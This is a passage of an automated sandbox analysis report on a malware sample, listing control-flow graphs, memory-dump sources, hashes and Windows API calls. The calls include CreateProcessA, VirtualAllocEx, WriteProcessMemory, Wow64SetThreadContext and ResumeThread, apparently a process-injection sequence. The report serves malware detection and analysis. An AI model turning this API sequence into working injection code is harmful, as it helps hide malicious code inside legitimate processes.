69c7b76-69c7b7d 559->562 563 69c7b66-69c7b6c 559->563 560->559 561 69c7b58 560->561 561->559 564 69c7b7f-69c7b8e 562->564 565 69c7b94 562->565 563->562 564->565 567 69c7b95 565->567 567->567
                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 069C7A86
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: c2510547228e339ea094d3b12ce5345d33120e67a35d758e1e2556b939c9248c
                                                      • Instruction ID: 0949f9d9d1deb246a77f06d3064c9acff80d523fbe03087c9dd3bc515ec93780
                                                      • Opcode Fuzzy Hash: c2510547228e339ea094d3b12ce5345d33120e67a35d758e1e2556b939c9248c
                                                      • Instruction Fuzzy Hash: E5B18071D00219CFDF50CFA9C8417EEBBB6BF44324F148569E848AB650DB749985CF92

                                                      Control-flow Graph
                                                      control_flow_graph 568 69c7850-69c78e5 570 69c791e-69c793e 568->570 571 69c78e7-69c78f1 568->571 578 69c7977-69c79a6 570->578 579 69c7940-69c794a 570->579 571->570 572 69c78f3-69c78f5 571->572 573 69c7918-69c791b 572->573 574 69c78f7-69c7901 572->574 573->570 576 69c7905-69c7914 574->576 577 69c7903 574->577 576->576 580 69c7916 576->580 577->576 585 69c79df-69c7a99 CreateProcessA 578->585 586 69c79a8-69c79b2 578->586 579->578 581 69c794c-69c794e 579->581 580->573 583 69c7950-69c795a 581->583 584 69c7971-69c7974 581->584 587 69c795c 583->587 588 69c795e-69c796d 583->588 584->578 599 69c7a9b-69c7aa1 585->599 600 69c7aa2-69c7b28 585->600 586->585 590 69c79b4-69c79b6 586->590 587->588 588->588 589 69c796f 588->589 589->584 591 69c79b8-69c79c2 590->591 592 69c79d9-69c79dc 590->592 594 69c79c4 591->594 595 69c79c6-69c79d5 591->595 592->585 594->595 595->595 597 69c79d7 595->597 597->592 599->600 610 69c7b38-69c7b3c 600->610 611 69c7b2a-69c7b2e 600->611 613 69c7b4c-69c7b50 610->613 614 69c7b3e-69c7b42 610->614 611->610 612 69c7b30 611->612 612->610 616 69c7b60-69c7b64 613->616 617 69c7b52-69c7b56 613->617 614->613 615 69c7b44 614->615 615->613 619 69c7b76-69c7b7d 616->619 620 69c7b66-69c7b6c 616->620 617->616 618 69c7b58 617->618 618->616 621 69c7b7f-69c7b8e 619->621 622 69c7b94 619->622 620->619 621->622 624 69c7b95 622->624 624->624
                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 069C7A86
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: a262a1fb402523434157707b2da5be12cebe5c9074bde128c9428df41d2382a5
                                                      • Instruction ID: ae1a0e09d53680cb4b1dc120c36766a0bc9e6653136d0dd4ee93264af79e53b7
                                                      • Opcode Fuzzy Hash: a262a1fb402523434157707b2da5be12cebe5c9074bde128c9428df41d2382a5
                                                      • Instruction Fuzzy Hash: 2B919071D00219DFDF54CFA8C841BEDBBB6BF48320F1485A9E848AB650DB749985CF92

                                                      Control-flow Graph
                                                      control_flow_graph 625 94b230-94b23f 626 94b241-94b24e call 94ac04 625->626 627 94b26b-94b26f 625->627 632 94b264 626->632 633 94b250 626->633 629 94b271-94b27b 627->629 630 94b283-94b2c4 627->630 629->630 636 94b2c6-94b2ce 630->636 637 94b2d1-94b2df 630->637 632->627 686 94b256 call 94b4c8 633->686 687 94b256 call 94b4b9 633->687 636->637 638 94b2e1-94b2e6 637->638 639 94b303-94b305 637->639 641 94b2f1 638->641 642 94b2e8-94b2ef call 94ac10 638->642 643 94b308-94b30f 639->643 640 94b25c-94b25e 640->632 644 94b3a0-94b3b9 640->644 646 94b2f3-94b301 641->646 642->646 647 94b311-94b319 643->647 648 94b31c-94b323 643->648 658 94b3bb-94b418 644->658 646->643 647->648 650 94b325-94b32d 648->650 651 94b330-94b339 call 94ac20 648->651 650->651 656 94b346-94b34b 651->656 657 94b33b-94b343 651->657 659 94b34d-94b354 656->659 660 94b369-94b376 656->660 657->656 676 94b41a-94b41c 658->676 659->660 661 94b356-94b366 call 94ac30 call 94ac40 659->661 667 94b378-94b396 660->667 668 94b399-94b39f 660->668 661->660 667->668 677 94b41e 676->677 678 94b448-94b460 676->678 681 94b420-94b421 677->681 682 94b422-94b446 677->682 679 94b462-94b465 678->679 680 94b468-94b493 GetModuleHandleW 678->680 679->680 683 94b495-94b49b 680->683 684 94b49c-94b4b0 680->684 681->682 682->678 683->684 686->640 687->640
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0094B486
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764461525.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_940000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: aabf2fee56ff9039a33f1ed3f43901cb719a73a03c5643a09f25c232d1589402
                                                      • Instruction ID: dd9b8dbfbbb523b6bbfa2523081a8b9b39576827db9f6804b03d681a93cc1387
                                                      • Opcode Fuzzy Hash: aabf2fee56ff9039a33f1ed3f43901cb719a73a03c5643a09f25c232d1589402
                                                      • Instruction Fuzzy Hash: 22816970A00B458FD724DF6AC045BAABBF5FF88304F008A2ED08AD7A51D775E949CB91

                                                      Control-flow Graph
                                                      control_flow_graph 798 944610-945f11 CreateActCtxA 801 945f13-945f19 798->801 802 945f1a-945f74 798->802 801->802 809 945f76-945f79 802->809 810 945f83-945f87 802->810 809->810 811 945f98 810->811 812 945f89-945f95 810->812 814 945f99 811->814 812->811 814->814
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 00945F01
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764461525.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_940000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 18259cbc85ab64beede3fc750f58253900729e60f543a7518b4e722301ad5e32
                                                      • Instruction ID: 1af3efa141fbd355127b409deb358d6758aadc059b18ffb82329eaecdc010cc6
                                                      • Opcode Fuzzy Hash: 18259cbc85ab64beede3fc750f58253900729e60f543a7518b4e722301ad5e32
                                                      • Instruction Fuzzy Hash: 2541F2B0C0071DDFDB24DFA9C944B9DBBB9BF44304F24809AE408AB255DBB56989CF91

                                                      Control-flow Graph
                                                      control_flow_graph 815 945e44-945e47 816 945e54-945f11 CreateActCtxA 815->816 818 945f13-945f19 816->818 819 945f1a-945f74 816->819 818->819 826 945f76-945f79 819->826 827 945f83-945f87 819->827 826->827 828 945f98 827->828 829 945f89-945f95 827->829 831 945f99 828->831 829->828 831->831
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 00945F01
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764461525.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_940000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 08e5e7ae2359465262359858faa40940b844d2fff518169da221a7e71a0d7a65
                                                      • Instruction ID: 9fdcc350bb8ebc06db6f9d10bb08336a6a19e9087b48b743768edf5ab62054a8
                                                      • Opcode Fuzzy Hash: 08e5e7ae2359465262359858faa40940b844d2fff518169da221a7e71a0d7a65
                                                      • Instruction Fuzzy Hash: 4141C2B0C00719CFDB24DFA9C944BDDBBB5BF48304F24809AD448AB265DBB56989CF91

                                                      Control-flow Graph
                                                      control_flow_graph 832 4ce2f9c-4ce45e4 834 4ce45ef-4ce45fe 832->834 835 4ce45e6-4ce45ec 832->835 836 4ce4603-4ce463c DrawTextExW 834->836 837 4ce4600 834->837 835->834 838 4ce463e-4ce4644 836->838 839 4ce4645-4ce4662 836->839 837->836 838->839
                                                      APIs
                                                      • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,04CE457D,?,?), ref: 04CE462F
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1769321176.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4ce0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: DrawText
                                                      • String ID:
                                                      • API String ID: 2175133113-0
                                                      • Opcode ID: 4579198e97e55a99183154a0045fa21efe5df3d0b2084fa645952c85fa5d56ec
                                                      • Instruction ID: 2aa8e551f2ea19977cc3a1948fba4b4cb43f783573abe3ff91cae4f938477e6f
                                                      • Opcode Fuzzy Hash: 4579198e97e55a99183154a0045fa21efe5df3d0b2084fa645952c85fa5d56ec
                                                      • Instruction Fuzzy Hash: 5431E2B5D013499FDB14CF9AD884AAEBBF5FB48310F14842AE919A7310D774A944CFA4
                                                      APIs
                                                      • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,04CE457D,?,?), ref: 04CE462F
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1769321176.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4ce0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: DrawText
                                                      • String ID:
                                                      • API String ID: 2175133113-0
                                                      • Opcode ID: 452acf6f55fb0cc29fe2ae94075ac222a92942a1c0954b7a7ad3cf4442466fbc
                                                      • Instruction ID: 4e2f89f6d2ab92005e9f1094db375729610f80fb6f0488f3521fd4b5dfccb43a
                                                      • Opcode Fuzzy Hash: 452acf6f55fb0cc29fe2ae94075ac222a92942a1c0954b7a7ad3cf4442466fbc
                                                      • Instruction Fuzzy Hash: B83100B5D00209DFCB10CF9AD984AEEBBF5BB48320F14842AE818A7210D774A944CFA4
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 069C7658
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 2bb4cdfa27cebc7138f53031653ae9de955fab5919c02d73dd3fa41d3f7418db
                                                      • Instruction ID: b16416581c2e20588cacd988631a5bac3196404faa3516c9d2cd6c747ed6717f
                                                      • Opcode Fuzzy Hash: 2bb4cdfa27cebc7138f53031653ae9de955fab5919c02d73dd3fa41d3f7418db
                                                      • Instruction Fuzzy Hash: 322126B59003499FCB10CFA9C984BEEBBF5FB48320F10842AE918A7251D7789944CBA5
                                                      APIs
                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 069C7658
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: b3bc103298d4541ebcc4aaf2bd023ba224ad47560f1a4c22aaa1cebde555b296
                                                      • Instruction ID: 6007c5c8e162063bafe0cd7c7696215eab4c28225102143b7f6c64df89f61baa
                                                      • Opcode Fuzzy Hash: b3bc103298d4541ebcc4aaf2bd023ba224ad47560f1a4c22aaa1cebde555b296
                                                      • Instruction Fuzzy Hash: D52144B19003499FCB10CFA9C984BEEBBF5FF48320F10842AE918A7251D7789944CFA5
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0094D787
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764461525.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_940000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: c431ffd1d6bae8637d811d9a68de77d9b2136c0bf51fe211ee2d382ea1e77608
                                                      • Instruction ID: 00c64bc5e57baa35b55ed5ee5068b61594d1be2c48e26eb719219dff1d54dd98
                                                      • Opcode Fuzzy Hash: c431ffd1d6bae8637d811d9a68de77d9b2136c0bf51fe211ee2d382ea1e77608
                                                      • Instruction Fuzzy Hash: 782103B59003089FDB10CF9AD984AEEBBF8EB48310F10841AE918A3310D378A950CFA0
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 069C7738
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: e898eeed205f6b4231882f239793b4bb408715be4be4903fa4b87233a0932089
                                                      • Instruction ID: 4d60130a098db2fc742292bf1dd231c0bf7fe5bc4d424e33b0b055cf925005b0
                                                      • Opcode Fuzzy Hash: e898eeed205f6b4231882f239793b4bb408715be4be4903fa4b87233a0932089
                                                      • Instruction Fuzzy Hash: 01214AB1C003599FCB10DFAAC9856EEBBF5FF88320F10842AE518A7250D7759544CFA1
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 069C74AE
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: 895269995fbd01015ffb6d0507092990e6df4b19876c7cd642a0abe2cc340620
                                                      • Instruction ID: 03eb71be66a4a098dedb689c19556c64da01eb649526ec61d2bf67333bf19761
                                                      • Opcode Fuzzy Hash: 895269995fbd01015ffb6d0507092990e6df4b19876c7cd642a0abe2cc340620
                                                      • Instruction Fuzzy Hash: FF2157B1D003088FDB10DFAAC4847EEBBF5AF88324F10842AD459A7240CB789944CFA5
                                                      APIs
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 069C7738
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 7dc9cac56b8dd27f551762b189cb9fee2b89d90b3ad936ad13b2c344bcecac38
                                                      • Instruction ID: 14f07380b64e4e4c89921009c6407590011b01c7fa0a6c478be9782c75678e98
                                                      • Opcode Fuzzy Hash: 7dc9cac56b8dd27f551762b189cb9fee2b89d90b3ad936ad13b2c344bcecac38
                                                      • Instruction Fuzzy Hash: 242116B18003599FCB10DFAAC885AEEBBF5FF48320F108429E559A7250C7749944DFA5
                                                      APIs
                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 069C74AE
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: ContextThreadWow64
                                                      • String ID:
                                                      • API String ID: 983334009-0
                                                      • Opcode ID: fe13cf04aaaebaa8a69918a83f7c7807bcad7e41629e6f3b2ee85ce0edabcc65
                                                      • Instruction ID: 2d0b6d2f37e0d17540f499493ba18dd213b5866638c92d5a8676c4bcece0aa0f
                                                      • Opcode Fuzzy Hash: fe13cf04aaaebaa8a69918a83f7c7807bcad7e41629e6f3b2ee85ce0edabcc65
                                                      • Instruction Fuzzy Hash: 782137B1D003098FDB10DFAAC4857EEBBF5AB48324F108429D459A7241CB789944CFA5
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0094D787
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764461525.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_940000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: 29d3726d5226e37c4e0c0378d12559395cb04a797b7c37504d39c70d49c0256e
                                                      • Instruction ID: 952ac1d88d429d23176be356a9812e996938e13cbac69623c9c23d4245f9f22a
                                                      • Opcode Fuzzy Hash: 29d3726d5226e37c4e0c0378d12559395cb04a797b7c37504d39c70d49c0256e
                                                      • Instruction Fuzzy Hash: 7221E4B5900348DFDB10CF9AD584AEEBBF8EB48310F14801AE918A3310D374A944CFA4
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 069C7576
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 31b1e32b58512450e2b2bc7f3211197d96a92ba77e69f762b412f2891d4121a2
                                                      • Instruction ID: 2078fcdb7a46428785a5a8082bb827edc66010cd068b10b7740f1554b2314656
                                                      • Opcode Fuzzy Hash: 31b1e32b58512450e2b2bc7f3211197d96a92ba77e69f762b412f2891d4121a2
                                                      • Instruction Fuzzy Hash: 3F1159B5C002489FCB10DFAAC8446EEBFF5EF88320F208819E519A7250CB759544CFA1
                                                      APIs
                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 069C7576
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 14db3972c51bd233637f4668997902a59dd909110fc27fe7c538d3b40065ffcd
                                                      • Instruction ID: e69a22533e6b18fd436f4ba73e983cbbbc8eab6669fe335772a3122cb35875eb
                                                      • Opcode Fuzzy Hash: 14db3972c51bd233637f4668997902a59dd909110fc27fe7c538d3b40065ffcd
                                                      • Instruction Fuzzy Hash: 381137B19002499FCB10DFAAC844BEEBFF5EF88320F208419E559A7250C775A954CFA5
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 67158697e4a7f8e8ed7a1911959179708a47fd08a30f7b882af010989dd93ff0
                                                      • Instruction ID: 38532de57dcac844b123ea33673f3a5f8566fc216d43162a333e679a2e77d1cc
                                                      • Opcode Fuzzy Hash: 67158697e4a7f8e8ed7a1911959179708a47fd08a30f7b882af010989dd93ff0
                                                      • Instruction Fuzzy Hash: 841158B1D003488FCB20DFAAC8447EEFBF4EB88324F20882AD459A7250CA759944CF95
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: 24b3602cf43ceed3218dfe87b398e145dbbb078fc2ac76e853c2286c9c7370fc
                                                      • Instruction ID: 86c3a4591826b1c9b3991eb28b5e0266af6a44f9d740f43a4cec9e9fcea2b529
                                                      • Opcode Fuzzy Hash: 24b3602cf43ceed3218dfe87b398e145dbbb078fc2ac76e853c2286c9c7370fc
                                                      • Instruction Fuzzy Hash: 3C113AB1D003498FCB14DFAAC4457EEFBF4EB88324F208419D459A7250CB75A944CFA5
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0094B486
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764461525.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_940000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: ff228ffb0480dea73633a413fc070c1090b22cea6eb6901a8358f0a5aa72efa9
                                                      • Instruction ID: 254ea9937b1528acc4e72826768f0361d6dd092dd8ce3a5703df49e38e00c9a8
                                                      • Opcode Fuzzy Hash: ff228ffb0480dea73633a413fc070c1090b22cea6eb6901a8358f0a5aa72efa9
                                                      • Instruction Fuzzy Hash: B911E0B5C003498FCB10DF9AC444ADEFBF8AB88324F10846AD859B7221D379A945CFA5
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 069CAF45
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID:
                                                      • API String ID: 410705778-0
                                                      • Opcode ID: f3dc0f452fb80e84144c1d514cf3ede9dcc453f76cee5a4001a9552f29700f33
                                                      • Instruction ID: bdfb1522165597d3027d9660fe5c6d1b0aa12f6c2cd75997630c2e22948f4735
                                                      • Opcode Fuzzy Hash: f3dc0f452fb80e84144c1d514cf3ede9dcc453f76cee5a4001a9552f29700f33
                                                      • Instruction Fuzzy Hash: 4F1106B5800348DFDB10DF9AC884BEEBBF8EB48320F108459E559A7610C375A944CFA1
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 069CAF45
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1771106922.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_69c0000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID:
                                                      • API String ID: 410705778-0
                                                      • Opcode ID: 37533264e795b2c627ab3471a5ba37644726d0fca86281530d65f991589176e2
                                                      • Instruction ID: 5126e9428fabece1ad01dad720b3f71ad9bfbc9071744ff35a590eaf766ca94f
                                                      • Opcode Fuzzy Hash: 37533264e795b2c627ab3471a5ba37644726d0fca86281530d65f991589176e2
                                                      • Instruction Fuzzy Hash: D611F5B58003499FDB10CF9AC884BDEFFF8EB48324F108459E959A7650D375A944CFA5
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764232332.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_8ed000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0e58b94346c74e01fb01db897d9047f36bed19800cdeeb22c31f49436e860a1a
                                                      • Instruction ID: 900a59333288efdfe501a2735c2c5f80b1aac0d99d27823064260924e3d7c263
                                                      • Opcode Fuzzy Hash: 0e58b94346c74e01fb01db897d9047f36bed19800cdeeb22c31f49436e860a1a
                                                      • Instruction Fuzzy Hash: 53213472504384DFCB05DF15D9C0B2BBF65FB98318F20C569E8098B256C336D85ACBA2
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764232332.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_8ed000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 52a01a37edb90204163989f884950a7be31d2f3d1a6f9a19f2296a9b93be26b4
                                                      • Instruction ID: 91f59101d64610c2ab96fbc2dd89be288c9f67d89b27eb3bf65dbe2ff8e06f25
                                                      • Opcode Fuzzy Hash: 52a01a37edb90204163989f884950a7be31d2f3d1a6f9a19f2296a9b93be26b4
                                                      • Instruction Fuzzy Hash: 54213A71504384DFDB05DF15D9C0B16BFA5FBA5318F20C169E9098F296C336E85AC7A2
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764296507.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_8fd000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4c97e77f110a0c173486c8e44e58f122ff4be602f29d4b8cfe577216ef6c2e75
                                                      • Instruction ID: 419fff927b7d1e2f2e67b815db0a6f8000a29acfd0dbfd396e1d7343e9dadf39
                                                      • Opcode Fuzzy Hash: 4c97e77f110a0c173486c8e44e58f122ff4be602f29d4b8cfe577216ef6c2e75
                                                      • Instruction Fuzzy Hash: 5221F571504708DFDB14DF24D584B26BB66FBC4314F20C569DB098B356CB3AD847CA61
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764296507.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_8fd000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0d6ab55c67468b1de90a98ba807916626707911eee36b25b40d5faa9ce51f18c
                                                      • Instruction ID: 8870051f791399723db60cd4a628c567c502f68e1f8be95a597935cb3e1e66e7
                                                      • Opcode Fuzzy Hash: 0d6ab55c67468b1de90a98ba807916626707911eee36b25b40d5faa9ce51f18c
                                                      • Instruction Fuzzy Hash: 4E210771504308DFDB05DF24D5C4B36BBA6FB84318F20C56DDB098B255C336E846CAA1
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764232332.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_8ed000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                      • Instruction ID: d49b323c82fef08a63c33289d743884465759cfbb7c2b71d25de91e8c9da7651
                                                      • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                      • Instruction Fuzzy Hash: 1311DF76404380CFCB02CF00D5C4B16BF71FBA4328F24C2A9D8094B256C33AE85ACBA1
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.1764232332.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                      Joe Sandbox IDA Plugin
